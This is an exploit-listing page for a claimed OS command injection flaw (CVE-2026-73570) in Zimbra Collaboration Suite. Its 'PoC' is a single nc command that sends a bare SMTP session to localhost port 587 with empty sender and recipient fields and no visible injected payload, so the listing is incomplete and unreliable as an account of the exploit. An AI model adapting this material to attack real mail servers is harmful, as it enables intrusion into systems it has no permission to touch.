Exploit for OS Command Injection in Synacor Zimbra Collaboration Suite
Exploit Code
## https://sploitus.com/exploit?id=C75D0338-3A26-5292-9380-30AF122F3CC0
# CVE-2026-73570
CVE-2026-73570 PoC
[More](https://trap.biu.life/search?q=method%3Dtcp%3A587%20%26%26%20request%3D%5EEHLO%20%26%26%20request%3DService%20status%20change&t=all)
```
echo 'EHLO mx-test.invalid
MAIL FROM:
RCPT TO:
QUIT\r\n' | nc 127.0.0.1 587
```